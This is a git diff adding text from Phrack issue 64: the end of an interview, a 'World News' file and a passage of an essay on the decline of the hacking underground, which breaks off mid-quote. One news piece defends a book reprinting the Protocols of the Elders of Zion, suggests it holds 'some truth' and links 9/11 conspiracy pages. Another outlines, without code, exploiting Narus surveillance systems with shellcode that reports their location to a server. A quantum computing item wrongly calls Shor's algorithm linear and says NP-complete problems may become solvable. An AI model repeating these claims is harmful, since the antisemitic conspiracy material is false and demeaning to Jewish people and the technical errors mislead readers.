+   Synnergy, or Devhell, USA and other countries have PHC...
+
+   Each one will have his space on "International Scenes". If you're part
+   of it, if you want to tell the "real story", just submit us a text. If
+   you are too paranoid to submit a tfile to Phrack, its ok. If you wish
+   to participate to the underground information, how journal is your
+   journal as well and we can find a solution that keep you anonymous.
+
+
+Q: Thank you for this interview, I hope readers will enjoy it!
+A; No problem, you're welcome. Can I have a beer now?
+
+
+--EOF--
diff --git a/phrack64/3.txt b/phrack64/3.txt
new file mode 100644
index 0000000..b93c45e
--- /dev/null
+++ b/phrack64/3.txt
@@ -0,0 +1,514 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)            Phrack #64 file 3               (* *)
+            | - |                                            | - |
+            |   |            Phrack World News               |   |
+            |   |                                            |   |
+            |   |   compiled by The Circle of Lost Hackers   |   |
+            |   |                                            |   |
+            |   |                                            |   |
+            (____________________________________________________)
+
+
+
+The Circle of Lost Hackers is looking for any kind of news related to
+security, hacking, conference report, philosophy, psychology, surrealism,
+new technologies, space war, spying systems, information warfare, secret
+societies, ... anything interesting! It could be a simple news with just
+an URL, a short text or a long text. Feel free to send us your news.
+
+Again, we need your help for this section. We can't know everything,
+we try to do our best, but we need you ... the scene needs you...the
+humanity needs you...even your girlfriend needs you but should already
+know this... :-)
+
+
+1. Speedy Gonzales news
+2. One more outrage to the freedom of expression
+3. How we could defeat the Orwellian Narus system
+4. Feeling safer in a spying world
+5. D-Wave computing demonstrates a quantum computer
+
+--------------------------------------------
+
+
+--[ 1.
+
+ _____                     _
+/  ___|                   | |
+\ `--. _ __   ___  ___  __| |_   _
+ `--. \ '_ \ / _ \/ _ \/ _` | | | |
+/\__/ / |_) |  __/  __/ (_| | |_| |
+\____/| .__/ \___|\___|\__,_|\__, |
+      | |                     __/ |
+      |_|                    |___/
+ _____                      _
+|  __ \                    | |
+| |  \/ ___  _ __  ______ _| | ___  ___
+| | __ / _ \| '_ \|_  / _` | |/ _ \/ __|
+| |_\ \ (_) | | | |/ / (_| | |  __/\__ \
+ \____/\___/|_| |_/___\__,_|_|\___||___/
+ _   _
+| \ | |
+|  \| | _____      _____
+| . ` |/ _ \ \ /\ / / __|
+| |\  |  __/\ V  V /\__ \
+\_| \_/\___| \_/\_/ |___/
+
+
+
+-Speedy News-[ There is no age to start hacking ]--
+
+http://www.dailyecho.co.uk/news/latest/display.var.
+1280820.0.how_girl_6_hacked_into_mps_commons_computer.php
+
+
+
+-Speedy News-[ Eeye hacked ? ]--
+
+  http://www.phrack.org/eeye_hacked.png
+
+
+
+-Speedy News-[ Anarchist Cookbook ]--
+
+   The anarchist cookbook version 2006, be careful...
+
+http://www.beyondweird.com/cookbook.html
+
+
+
+-Speedy News-[ Is Hezbollah better than Israeli militants? ]--
+
+http://www.fcw.com/article96532-10-19-06-Web
+
+
+
+-Speedy News-[ How to be secure like an 31337 DoD dude ]--
+
+https://addons.mozilla.org/en-US/firefox/addon/3182
+
+
+
+-Speedy News-[ Hi I'm Skyper, ex-Phrack and I like Phrack's design! ]--
+
+http://conf.vnsecurity.net/cfp2007.txt
+
+
+
+-Speedy News-[ The most obscure company in the world ]--
+
+http://www.vanityfair.com/politics/features/2007/03/spyagency200703?
+printable=true&currentPage=all
+
+A "MUST READ" article...
+
+
+
+-Speedy News-[ Terrorism excuse Vs freedom of information ]--
+
+http://www.usatoday.com/news/washington/2007-03-13-archives_N.htm
+
+
+
+-Speedy News-[ Zero Day can happen to anyone ]--
+
+http://www.youtube.com/watch?v=L74o9RQbkUA
+
+
+
+-Speedy News-[ NSA, contractors and the success of failure ]--
+
+http://www.govexec.com/dailyfed/0407/040407mm.htm
+
+
+
+-Speedy News-[Blood, Bullets, Bombs, and Bandwidth ]--
+
+http://rezendi.com/travels/bbbb.html
+
+
+
+-Speedy News-[ The day when the BCC predicted the future ]--
+
+http://www.prisonplanet.com/articles/february2007/260207building7.htm
+
+
+
+-Spirit News-[ Just because we like these websites ]--
+
+http://www.cryptome.org/
+http://www.2600.com/
+
+
+
+
+--[ 2. One more outrage to the freedom of expression
+		by Napoleon Bonaparte
+
+
+The distribution of a book containing a copy of the Protocols of
+the Elders of Zion was stopped in Belgium and France by Israeli 
+lobbyists.
+
+The authors advance that the bombing of the WTC could be in relation with
+Israel. It's not the good place to argue about this statement, but what
+is interesting is that 6 years after 11/09/01 we read probably more than
+100 theories about the possible authors of WTC bombing: Al Qaeda, Saoudi
+Arabia, Irak (!) or even Americans themselves. But this book advances the
+theory that _maybe_ there is something with Israel and the diffusion is
+forbidden, just one month after its release.
+
+Before releasing this book, the Belgian association antisemitisme.be
+read it to give his opinion. The result is apparent: the book is not
+antisemitic. The only two things that could be antisemitic in this book
+are:
+
+- the diffusion of "The Protocols of the Elders of Zion" in the annexe
+of the book. If you take a look on Amazon, you can find more than
+30 books containing The Protocols.
+
+- the cover of the book which show the US and Israeli flags linked with a
+bundle of dollars.
+
+Actually you can find the same kind of picture on the website of the
+Americo-Israeli company Zionoil: http://www.zionoil.com/ . And the
+cover of the book was designed before the author found the same picture on
+Zionoil's website.
+
+Also, something unsettling in this story is that the book was removed
+on the insistence of a Belgian politician: Claude Marinower. And on the
+website of this politician, we can see him with Moshe Katsav who is the
+president of Israel and recently accused by Attorney General Meni Mazuz
+for having committed rape and other crimes...
+
+http://www.claudemarinower.be/uploads/ICJP-israelpresi.JPG
+
+So why the distribution of this book was banned? Because the diffusion of
+"The Protocols of the Elders of Zion" is dangerous? Maybe but...
+
+You can find on Internet or amazon some books like "The Anarchist
+Cookbook" which is really more "dangerous" than the "The Protocols of
+the Elders of Zion".  In this book you can find some information like how
+to kill someone or how to make a bomb. If we have to give to our children
+either "The Anarchist Cookbook" or "The Protocols of the Elders of Zion",
+I'm sure that 100% of the population will prefer to give "The Protocols
+of the Elders of Zion". Simply because it's not dangerous.
+
+So why? Probably because there are some truth in this book.
+
+The revelations in this book are not only about 11/09/2001 but also about
+the Brabant massacres in Belgium from 1982 to 1985. The authors advances
+that these massacres were linked to the GLADIO/stay-behind network.
+
+As Napoleon Bonaparte said: "History is a set of lies agreed upon".
+
+He was right...
+
+
+[1]
+http://www.antisemitisme.be/site/event_detail.asp?language=FR&eventId
+=473&catId=26
+
+[2] http://www.ejpress.org/article/14608
+
+[3]
+http://www.wiesenthal.com/site/apps/nl/content2.asp?c=fwLYKnN8LzH&b
+=245494&ct=2439597
+
+[4]
+http://www.osservatorioantisemitismo.it/scheda_evento.asp?number=1067&
+idmacro=2&n_macro=3&idtipo=59
+
+[5] http://ro.novopress.info/?p=2278
+
+[6] http://www.biblebelievers.org.au/przion1.htm
+
+
+
+--[ 3. How we could defeat the Orwellian Narus system
+		by Napoleon Bonaparte
+
+
+AT&T, Verizon, VeriSign, Amdocs, Cisco, BellSouth, Top Layer Networks,
+Narus, ... all theses companies are inter-connected in our wonderful
+Orwellian world. And I don't even talk about companies like Raytheon
+or others involved in "ECHELON".
+
+That's not new, our governments spy us. They eavesdrop our phones
+conversation, our Internet communications, they take beautiful
+photos of us with their imagery satellites, they can even see through
+walls using satellites reconnaissance (Lacrosse/Onyx?), they install
+cameras everywhere in our cities (how many cameras in London???),
+RFID tags are more and more present and with upcoming technologies like
+nanotechnologies, bio-informatics or smartdusts system there is really
+something to worry about.
+
+With all these systems already installed, it's utopian to think that
+we could come back to a world without any spying system. So what we
+can do ? Probably not a lot of things. But I would like to propose a
+funny idea about NARUS, the system allowing governments to eavesdrop
+citizens Internet communications.
+
+This short article is not an introduction to Narus. I will just give
+you a short description of its capacities. A more longer article
+could be written in a next release of Phrack (any volunteer?). So
+Narus is an American company founded in 97. The first work of NARUS
+was to analyze IP network traffic for billing purpose. In order to
+accomplish this they have strongly contributed to the standardization
+of the IPDR Streaming Protocol by releasing an API Code [1] (study this
+doc, it's a key to break NARUS). Nowadays, Narus is also included in
+what I will call the "spying business". According to their authors,
+they can collect data from links, routers, soft switches, IDS/IPS,
+databases, ..., normalize, correlate, aggregate and analyze all these
+data to provide a comprehensive and detailed model of users, elements,
+protocols, applications and networks behaviors. And the most important:
+everything is done in real time. So all your e-mails, instant messages,
+video streams, P2P traffic, HTTP traffic or VOIP can be monitored. And
+they doesn't care about which transmission technology you use, optical
+transmission can also be monitored. This system is simply amazing and 
+we should send our congratulations to their designers. But we should 
+also send our fears...
+
+If we want to block Narus, there is an obvious way: using
+cryptography. Nowadays, it's quite easy to send an encrypted email. You
+don't even have to worry about your email client, everything it's
+transparent (once configured). The problem is that you need to give
+your public key to your interlocutor, which is not really "user
+friendly". Especially if the purpose is simply to send an email to
+your girlfriend. But it's still the best solution to block a system
+like Narus. Another way to block Narus is to use steganography, but
+it's more complicate to implement.
+
+In conclusion, there is no way to stop totally a system like Narus and
+the only good way to block it is to use cryptography. But we, hackers,
+we can do something against Narus. Something funny. The idea is the
+following: we should know where a Narus system is installed!
+
+First step. An organization, a country or simply someone should buy
+a Narus system and reverse it. There are a lot of tools to reverse a
+system, free or commercial. Since the purpose of Narus is to analyze
+data, the main task is parsing data. And we know that systems parsing
+data are the most sensitive to bugs. So a first idea could be to fuzzing
+it with random requests and if it doesn't work doing some reversing. Once
+a bug is detected (and for sure, there IS at least one bug), the next
+step is to exploit it. Difficult task but not impossible. The most
+interesting part is the next one: the shellcode.
+
+There are two possibilities, either the system where Narus is installed
+has an outgoing Internet connexion or there isn't an outgoing Internet
+connexion. If not, the shellcode will be quite limited, the "best"
+idea is maybe just to destroy the system but it's not useful. What is
+useful is when Narus is installed on a system with an outgoing Internet
+connexion. We don't want a shell or something like that on the system,
+what we want is to know where a Narus system is installed. So what our
+shellcode has to do is just to send a ping or a special packet to a
+server on Internet to say "hello a Narus is installed at this place". We
+could hold a database with all the Narus system we discover in the world.
+
+This idea is probably not very difficult to implement. The only bad
+thing is if we release the vulnerability, it won't take a long time to
+Narus to patch it.
+
+But after all, what else can we do?
+
+Again, as Napoleon said: "Victory belongs to the most persevering".
+
+And hackers are...
+
+
+[1] http://www.ipdr.org/public/DocumentMap/SP2.2.pdf
+
+
+--[ 4. Feeling safer in a spying world
+		by Julius Caesar
+
+
+At first, it's subtle. It just sneaks up on you. The only ones who
+notice are the paranoid tinfoil hat nutjobs -- the ones screaming about
+conspiracies and big brother. They take a coincidence here and a fact
+from over there and come up with 42. It's all about 42.
+
+We need cameras at ATM machines, to catch robbers and muggers. Sometimes
+they even catch a shot of the Ryder truck driving by in the background. 
+People get mugged in elevators, so we need some cameras there too. 
+Traffic can be backed up for a while before the authorities notice, so 
+let's have some cameras on the highway. Resolution gets better, and we 
+can catch more child molestors and terrorists if they can record license 
+plates and faces.
+
+Cameras at intersections catch people running red lights and
+speeding. We're getting safer every day.
+
+Some neighborhoods need cameras to catch the hoods shooting each
+other. Others need cameras to keep the sidewalks safe for shoppers. It's
+all about safety.
+
+Then one day, the former head of the KGIA is in charge, or arranges
+for his dimwitted son to fuck up yet again as president of something.
+
+Soon, we're at war. Not with anyone in particular. Just Them. You're
+either with us, or you're with Them, and we're gonna to git Them.
+
+Our phone calls need to me monitored, to make sure we're not one
+of Them. Our web browsing and shopping and banking and reading and
+writing and travel and credit all need to be monitored, so we can catch
+Them. We'll need to be seached when travelling or visiting a government
+building because we might have pointy metal things or guns on us. We
+don't want to be like Them.
+
+It's important to be safe, but how can we tell if we're safe or not? What
+if we wonder into a place with no cameras? How would we know? What if
+our web browsing isn't being monitored? How can we make sure we're safe?
+
+Fortunately, there are ways.
+
+Cameras see through a lens, and lenses have specific shapes with unique
+characteristics. If we're in the viewing area  of a camera, then we
+are perpendicular to a part of the surface of the lens, which usually
+has reflective properties. This allows us to know when we're safely in
+view of a camera.
+
+All it takes is a few organic LEDs and a power supply (like a 9V
+battery). Arrange the LEDs in a circle about 35mm in diameter, and wire
+them appropriately for the power supply. Cut a hole in the center of
+the circle formed by the LEDs.
+
+Now look through the hole as you pan around the room. When you're
+pointing at a lens, the portion of the curved surface of the lens which
+is perpendicular to you will reflect the light of the LEDs directly
+back at you. You'll notice a small bright white pinpoint. Blink the
+LEDs on and off to make sure it's reflecting your LEDs, and know that
+you are now safer.
+
+Worried that your Internet connection may not be properly monitored
+for activity that would identify you as one of Them? There are ways to
+confirm this too.
+
+Older equipment, such as carnivore or DCS1000 could often be detected
+by traceroute, which would show up as odd hops on your route to the
+net. As recently as 2006, AT&T's efforts to keep us safe showed up with
+traceroute. But the forces of Them have prevailed, and our protectors
+were forced to stop watching our net traffic. Almost. We can no longer
+feel safe when seeing that odd hop, because it doesn't show up on
+traceroute anymore.
+
+It will, however, show up with ping -R, which requests every machine
+to add its IP to the ping packet as it travels the network.
+
+First, do a traceroute to find out where your ISP connects to the rest
+of the net;
+
+[snip]
+ 5  68.87.129.137 (68.87.129.137)  28.902 ms  14.221 ms  13.883 ms
+ 6  COMCAST-IP.car1.Washington1.Level3.net (63.210.62.58)  19.833 ms *
+ 21.768 ms
+ 7  te-7-2.car1.Washington1.Level3.net (63.210.62.49)  19.781 ms  19.092
+ ms  17.356 ms
+
+Hop #5 is on comcast's network. Hop #6 is their transit provider. We
+want to send a ping -R to the transit provider
+(63.210.62.58);
+
+[root@phrack root]# ping -R 63.210.62.58
+PING 63.210.62.58 (63.210.62.58) from XXX.XXX.XXX.XXX : 56(124) bytes
+of data.
+64 bytes from 63.210.62.58: icmp_seq=0 ttl=243 time=31.235 msec
+NOP
+RR:	[snip]
+	68.87.129.138
+	68.86.90.90
+	4.68.121.50
+	4.68.127.153
+	12.123.8.117
+
+117.8.123.12.in-addr.arpa. domain name pointer
+sar1-a360s3.wswdc.ip.att.net.
+
+An AT&T hop on Level3's network? Wow, we are still safely under the
+watchful eye of our magnificent benevolent intelligence agencies. I
+feel safer already.
+
+
+
+--[ 5. D-Wave demonstrates a quantum computer
+	     by aris
+
+February the 13'th, 2007, Wave computing made a public demonstration
+of their brand-new quantum computer, which could be a revolution in 
+computing and in cryptography in general. The demonstration took 
+place at Mountain View, Silicon Valley, though the quantum computer 
+itself was left at Vancouver, remotely connected by Internet.
+
+The Quantum computer is a hybrid construction of classical computing and
+a quantum "accelerator" chip: The classical computer makes the ordinary
+operations, isolates the complicate stuff, prepare it to be processed
+by the quantum chip then gives back the results. The whole mechanism
+is meant to be usable over networks (with RPC) to be accessible for
+companies that want a quantum computer but can't manage to handle it
+at their main office (The hardware has special requirements). [1]
+
+The quantum chip is a 16 Qbits engine, using superconductiong
+electronics.
+
+Previous tries to do quantum computers were made previously, none of them
+known to have more than 3 or 4 Qbits. D-Wave also pretends being able
+to scale that number of Qbits up to 1024 in 2008 ! That fact made a lot
+of people in scientific area skeptic about the claims of D-Wave. The US
+National Aeronautics and Space Administration (commonly known as NASA)
+confirmed to the press that they've built the special chip for D-Wave
+conforming their specifications. [2]
+
+Now, how does the chip works ? D-Wave hasn't released that much details
+about the internals of their chip. They have chosen the superconductor
+because it makes easier to exploit quantum mechanics. When atoms are 
+very cold (approaching the 0K), they transform themselves into 
+superconducting atoms. They have special characteristics, including the 
+fact their electrons get a different quantum behaviur.
+
+In the internals, the chips contains 16 Qbits arranged in a 4x4 grid,
+each Qbit being coupled with its four immediate neighbors and some in
+the diagonals. [3]
+
+The coupling of Qbits is what gives them their power : a Qbit is
+believed to be at two states at same time. When coupling two Qbits,
+the combination of their state contains four states, and so on.
+The more Qbits are coupled together, the more possible number of states
+they have, and when working an algorithm on them, you manipulate all
+of their states at once, giving a very important performance boost. By
+its nature, it may even help to resolve NP-Complete problems, that is,
+problems that cannot be resolved by polynomial algorithms (we think
+of large sudoku maps, multivariate polynomial systems, factoring large
+integers ...).
+
+Not coupling all of their Qbits makes their chip easier to build and
+to scale, but their 16Qbits computer is not equal to the theoretical 16
+Qbits computers academics and governments are trying to build for years.
+
+The impact of this news to the world is currently minimal. Their chips
+currently work slower than a low-range personal computer and costs
+thousands of dollars, but maybe in some years it will become a real
+solution for solving NP problems.
+
+The NP problem that most people involved in security know is obviously
+the factoring of large numbers. We even have a proof that it exists
+a *linear* algorithm to factorize a multiple of two large integers,
+it is named Shor's algorithm. It means when we'll have the hardware
+to run it, factorizing a 1024 bits RSA private key will only take two
+times the time needed to factorize a 512 bits key.
+
+It completely destroys the security of the public cryptography as we
+know it now.
+Unfortunaly, we have no information on which known quantum algorithms
+run on D-Wave computer, and D-Wave made no statement about running
+Shor's algorithm on their beast. Also, no claim have been given letting
+us think the chip could break RSA. And for sure, NSA experts probably
+already studied the situation (in the case they don't already own their
+own quantum computer).
+
+References:
+
+[1] http://www.dwavesys.com/index.php?page=quantum-computing
+[2] http://www.itworld.com/Tech/3494/070309nasaquantum/index.html
+[3] http://arstechnica.com/articles/paedia/hardware/quantum.ars
+
diff --git a/phrack64/4.txt b/phrack64/4.txt
new file mode 100644
index 0000000..158aa73
--- /dev/null
+++ b/phrack64/4.txt
@@ -0,0 +1,1139 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 4              (* *)
+            | - |                                            | - |
+            |   |  A brief history of the Underground scene  |   |
+            |   |                                            |   |
+            |   |        By The Circle of Lost Hackers       |   |
+            |   |                                            |   |
+            |   |              Duvel@phrack.org              |   |
+            (____________________________________________________)                           
+
+
+--[ Contents
+
+1. Introduction
+2. The security paradox
+3. Past and present Underground scene
+	3.1. A lack of culture and respect for ancient hackers
+	3.2. A brief history of Phrack
+	3.3. The current zombie scene
+4. Are security experts better than hackers?
+	4.1. The beautiful world of corporate security
+	4.2. The in-depth knowledge of security conferences
+5. Phrack and the axis of counter attacks
+	5.1. Old idea, good idea
+	5.2. Improving your hacking skills
+	5.3. The Underground yellow pages
+	5.4. The axis of knowledge
+		5.4.1. New Technologies
+		5.4.2. Hidden and private networks
+		5.4.3. Information warfare
+		5.4.4. Spying System
+6. Conclusion
+
+
+--[ 1. Introduction
+
+"It's been a long long time,
+I kept this message for you, Underground
+But it seems I was never on time
+Still I wanna get through to you, Underground..."
+
+    I am sure most of you know and love this song (Stir it Up). After all,
+who doesn't like a Bob Marley song? The lyrics of this song fit very well
+with my feeling : I was never on time but now I'm ready to deliver you
+the message.
+
+    So what is this article about? I could write another technical article
+about an eleet technique to bypass a buffer overflow protection, how to
+inject my magical module in the kernel, how to reverse like an eleet or
+even how to make a shellcode for a not-so-famous OS. But I won't. There
+are some other people who can do it much better than I could. 
+
+    But it is the reason not to write a technical article. The purpose of 
+this article is to launch an SOS. An SOS to the scene, to everyone, to all 
+the hackers in the world. To make all the next releases of Phrack better 
+than ever before. And for this I don't need a technical article. I need 
+what I would call Spirit.
+
+    Do you know what I mean by the word spirit?
+
+
+--[ 2. The security paradox.
+
+    There is something strange, really strange. I always compare the
+security world with the drug world. Take the drugs world, on the one side
+you have all the "bad" guys: cartels, dealers, retailers, users... On
+the other side, you have all the "good" guys: cops, DEA, pharmaceutical
+groups creating medicines against drugs, president of the USA asking for
+more budget to counter drugs... The main speech of all these good guys
+is : "we have to eradicate drugs!". Well, why not. Most of us agree.
+
+    But if there is no more drugs in the world, I guess that a big part
+of the world economy would fall. Small dealers wouldn't have the money to
+buy food, pharmaceutical groups would loose a big part of their business,
+DEA and similar agencies wouldn't have any reason to exist. All the
+drugs centers could be closed, banks would loose money coming from the
+drugs market. If you take all thoses things into consideration, do
+you think that governments would want to eradicate drugs? Asking the
+question is probably answering it.
+
+    Now lets move on to the security world.
+
+    On the one side you have a lot of companies, conferences,
+open source security developers, computer crime units... On the
+other side you have hackers, script kiddies, phreackers.... Should
+I explain this again or can I directly ask the question? Do you really
+think that security companies want to eradicate hackers?
+
+    To show you how these two worlds are similar, lets look at another
+example. Sometimes, you hear about the cops arrested a dealer, maybe a
+big dealer. Or even an entire cartel. "Yeah, look ! We have arrested a
+big dealer ! We are going to eradicate all the drugs in the world!!!". And
+sometimes, you see a news like "CCU arrests Mafiaboy, one of the best
+hacker in the world". Computer crime units and DEA need publicity - they 
+arrest someone and say that this guy is a terrorist. That's the best way 
+to ask for more money. But they will rarely arrest one of the best hackers 
+in the world. Two reasons. First, they don't have the intention (and if 
+they would, it's probably to hire him rather than arrest him). Secondly, 
+most of the Computer Crime Units don't have the knowledge required.
+
+    This is really a shame, nobody is honest. Our governments claim that
+they want to eradicate hackers and drugs, but they know if there were
+no more hackers or drugs a big part of the world economy could fall. It's
+again exactly the same thing with wars. All our presidents claim that we
+need peace in the world, again most of us agree. But if there are no more
+wars, companies like Lockheed Martin, Raytheon, Halliburton, EADS, SAIC...
+will loose a huge part of their markets and so banks wouldn't have
+the money generated by the wars.
+
+    The paradox relies in the perpetual assumption that threat is
+generated from abuses where in fact it might comes from inproper 
+technological design or money driven technological improvement where the 
+last element shadows the first. And when someone that is dedicated enough 
+digs it, we have a snowball effect, thus every fish in the pound at one 
+time or an other become a part of it.
+
+   And as you can see, this paradox is not exclusive to the security
+industry/underground or even the computer world, it could be considered
+as the gold idol paradox but we do not want to get there.
+
+    In conclusion, the security world need a reason to justify its
+business. This reason is the presence of hackers or a threat (whatever 
+hacker means), the presence of an hackers scene and in more general terms 
+the presence of the Underground.
+
+    We don't need them to exist, we exist because we like learning,
+learning what we are not supposed to learn. But they give us another good
+reason to exist. So if we are "forced" to exist, we should exist in
+the good way. We should be well organized with a spirit that reflect our
+philosophy. Unfortunately, this spirit which used to characterized us is 
+long gone...
+
+
+--[ 3. Past and Present Underground scene
+
+    The "scene", this is a beautiful word. I am currently in a country
+very far away from all of your countries, but it is still an
+industrialized country. After spending some months in this country, I found
+some old-school hackers. When I asked them how the scene was in their 
+country, they always answered the same thing: "like everywhere, dying". It's 
+a shame, really a shame. The security world is getting larger and larger and 
+the Underground scene is dying.
+
+    I am not an old school hacker. I don't have the pretension to claim
+it I would rather say that I have some old-school tricks or maybe that my
+mind is old-school oriented, but that's all. I started to enjoy the
+hacking life more or less 10 years ago. And the scene was already dying.
+
+    When I started hacking, like a lot of people, I have read all the past
+issues of Phrack. And I really enjoyed the experience. Nowadays,
+I'm pretty sure that new hackers don't read old Phrack articles anymore. 
+Because they are lazy, because they can find information elsewhere, 
+because they think old Phracks are outdated... But reading old Phracks is 
+not only to acquire knowledge, it's also to acquire the hacking spirit.
+
+
+----[ 3.1 A lack of culture and respect for ancient hackers
+
+    How many new hackers know the hackers history? A simple example is 
+Securityfocus. I'm sure a lot of you consult its vulnerabilities
+database or some mailing list. Maybe some of you know Kevin Poulsen who
+worked for Securityfocus for some years and now for Wired. But how many of
+you know his history? How many knew that at the beginning of the 80's he
+was arrested for the first time for breaking into ARPANET? And that he
+was arrested a lot more times after that as well. Probably not a lot
+(what's ARPANET after all...).
+
+    It's exactly the same kind of story with the most famous hacker in
+the world: Kevin Mitnick. This guy really was amazing and I have a
+total respect for what he did. I don't want to argue about his present
+activity, it's his choice and we have to respect it.  But nowadays,
+when new hackers talk about Kevin Mitnick, one of the first things I
+hear is : "Kevin is lame. Look, we have defaced his website, we are much
+better than him". This is completely stupid. They have probably found a
+stupid web bug to deface his website and they probably found the way to
+exploit the vulnerability in a book like Hacking Web Exposed. And after
+reading this book and defacing Kevin's website, they claim that Kevin
+is lame and that they are the best hackers in the world... Where are we
+going? If these hackers could do a third of what Kevin did, they would
+be considered heroes in the Underground community.
+
+    Another part of the hacking culture is what some people name "The
+Great Hackers War" or simply "Hackers War". It happened 15 years ago
+between probably the two most famous (best?) hackers group which had
+ever existed: The Legion of Doom and Master of Deception. Despite that
+this chapter of the hacking history is amazing (google it), what I
+wonder is how many hackers from the new generation know that famous
+hackers like Erik Bloodaxe or The Mentor were part of these groups.
+Probably not a lot. These groups were mainly composed of skilled and
+talented hackers/phreackers. And they were our predecessor. You can still
+find their profiles in past issues of Phrack. It's still a nice read.
+
+    Let's go for another example. Who knows Craig Neidorf? Nobody? Maybe
+Knight Lightning sounds more familiar for you... He was the first editor
+in chief of Phrack with Taran King, Taran King who called him his
+"right hand man". With Taran King and him, we had a lot of good articles,
+spirit oriented. So spirit oriented that one article almost sent him
+to jail for disclosing a confidential document from Bell South. 
+Fortunately, he didn't go in jail thanks to the Electronic Frontier 
+Foundation who preached him. Craig wrote for the first time in Phrack 
+issue 1 and for the last time in Phrack issue 40. He is simply the best
+contributor that Phrack has ever had, more than 100 contributions. Not 
+interesting? This is part of the hacking culture.
+
+    More recently, in the 90's, an excellent "magazine" (it was more a
+collection of articles) called F.U.C.K. (Fucked Up College Kids) was
+made by a hacker named Jericho... Maybe some new hackers know Jericho for 
+his work on Attrition.org (that's not sure...), but have you already taken
+time to check Attrition website and consult all the good work that Jericho
+and friends do? Did you know that Jericho wrote excellent Phrack World
+News under the name Disorder 10 years ago (and trust me his news were 
+great) ? Stop thinking that Attrition.org is only an old dead mirror of 
+web site defacements, it's much more and it's spirit oriented.
+
+    Go ask Stephen Hawking if knowing the scientific story is not
+important to understand the scientific way/spirit... Do you think that 
+Stephen doesn't know the story of Aristotle, Galileo, Newton or Einstein ?
+
+    To help wannabe hackers, I suggest that they read "The Complete
+History of Hacking" or "A History of Computer Hacking" which are very 
+interesting for a first dive in the hacking history and that can easily be 
+found with your favorite search engine.
+
+    Another good reading is the interview of Erik Bloodaxe in 1994
+(http://www.eff.org/Net_culture/Hackers/bloodaxe-goggans_94.interview)
+where Erik said something really interesting about Phrack:
+
+"I, being so ridiculously nostalgic and sentimental, didn't want to see
+it (phrack) just stop, even though a lot of people always complain about
+the content and say, "Oh, Phrack is lame and this issue didn't have enough
+info, or Phrack was great this month, but it really sucked last month."
+You know, that type of thing. Even though some people didn't always
+agree with it and some people had different viewpoints on it, I really
+thought someone needed to continue it and so I kind of volunteered for
+it."
+
+    It's still true...
+
+
+----[ 3.2 A brief history of Phrack
+
+    Let's go for a short hacking history course and let's take a look at
+old Phracks where people talked about the scene and what hacking is.
+
+
+Phrack 41, article 1:
+---------------------
+
+"The type of public service that I think hackers provide is not showing
+security holes to whomever has denied their existence, but to merely
+embarrass the hell out of those so-called computer security experts
+and other purveyors of snake oil."
+
+    This is true, completely true. This is closely related to what I said
+before. If there are no hackers, there are no security experts. They
+need us. And we need them. (We are family)
+
+
+
+Phrack 48, article 2:
+---------------------
+
+    At the end of this article, there is the last editorial of Erik
+Bloodaxe. This editorial is excellent, everyone should read it. I will
+just reproduce some parts here:
+
+"... The hacking subculture has become a mockery of its past self.
+People might argue that the community has "evolved" or "grown" somehow,
+but that is utter crap.  The community has degenerated.  It has become a
+media-fueled farce.  The act of intellectual discovery that hacking once
+represented has now been replaced by one of greed, self-aggrandization
+and misplaced post-adolescent angst... If I were to judge the health of
+the community by the turnout of this conference, my prognosis would be 
+"terminally ill."..."
+
+    And this was in 1996. If we ask to Erik Bloodaxe now what he thinks
+about the current scene, I'm pretty sure he would say something
+like: "irretrievable" or "the hacking scene has reached a point of no
+return".
+
+"...There were hundreds of different types of systems, hundreds
+of different networks, and everyone was starting from ground zero.
+There were no public means of access; there were no books in stores or
+library shelves espousing arcane command syntaxes; there were no classes
+available to the layperson. ..."
+
+    Have you ever heard of a "hackademy"? Nowadays, if you want to be a
+hacker it's really easy. Just go to a hacker school and they will teach
+you some of the more eleet tricks in the world. That's the new hacker way.
+
+"Hacking is not about crime. You don't need to be a criminal to be
+a hacker. Hanging out with hackers doesn't make you a hacker any more
+than hanging out in a hospital makes you a doctor. Wearing the t-shirt
+doesn't increase your intelligence or social standing. Being cool doesn't
+mean treating everyone like shit, or pretending that you know more than
+everyone around you."
+
+    So what is hacking? My point of view is that hacking is a philosophy,
+a philosophy of life that you can apply not only to computers but to
+a lot of things. Hacking is learning, learning computers, networks,
+cryptology, telephone systems, spying system and agencies, radio, what
+our governments hide... Actually all non-conventional subjects or what
+could also be called a third eye view of the context.
+
+"There are a bunch of us who have reached the conclusion that the "scene"
+is not worth supporting; that the cons are not worth attending; that the
+new influx of would-be hackers is not worth mentoring. Maybe a lot of us
+have finally grown up."
+
+    Here's my answer to Erik 10 years later: "No Eric, you hadn't finally
+grown up, you were right." Erik already sent an SOS 10 years ago and
+nobody heard it.
+
+
+Phrack 50, article 1:
+---------------------
+
+"It seems, in recent months, the mass media has finally caught onto
+what we have known all along, computer security _IS_ in fact important.
+Barely a week goes by that a new vulnerability of some sort doesn't pop up
+on CNN. But the one thing people still don't seem to fathom is that _WE_
+are the ones that care about security the most...  We aren't the ones that
+the corporations and governments should worry about...	We are not
+the enemy."
+
+    No, we are not the enemy. But a lot of people claim that we are and
+some people even sell books with titles like "Know your enemy". It's
+probably one of the best ways to be hated by a lot of hackers. Don't be
+surprised if there are some groups like PHC appearing after that.
+
+
+Phrack 55, article 1:
+---------------------
+
+    Here I will show you the arrogance of the not-so-far past editor,
+answering some comments:
+
+"...Yeah, yeah, Phrack is still active you may say. Well let me tell
+you something.	Phrack is not what it used to be. The people who make
+Phrack are not Knight Lightning and Taran King, from those old BBS
+days. They are people like you and me, not very different, that took
+on themselves a job that it is obvious that is too big for them. Too
+big? hell, HUGE. Phrack is not what it used to be anymore. Just try
+reading, let's say, Phrack 24, and Phrack 54..."
+
+    And the editor replied (maybe Route):
+
+"bjx of "PURSUiT" trying to justify his `old-school` ezine.  bjx wrote
+a riveting piece on "Installing Slackware" article.  Fear and respect
+the lower case "i"".
+
+    This is a perfect example of how the Underground scene has grown up in
+the last few years. We can interpret editor's answer like "I'm writing
+some eleet articles and not you, so I don't have to take into 
+consideration your point of view". But it was a really pertinent remark.
+
+
+Phrack 56, article 1:
+------------------------------
+
+    Here is another excellent example to show you the arrogance of the
+Underground scene. Again, it's an answer to a comment from someone:
+
+"...IMHO it hasn't improved. Sure, some technical aspects of the
+magazine have improved, but it's mostly a dry technical journal these
+days.  The personality that used to characterize Phrack is pretty much
+non-existant, and the editorial style has shifted towards one of `I know
+more about buffer overflows than you` arrogance. Take a look at the Phrack
+Loopback responses during the first 10 years to the recent ones. A much
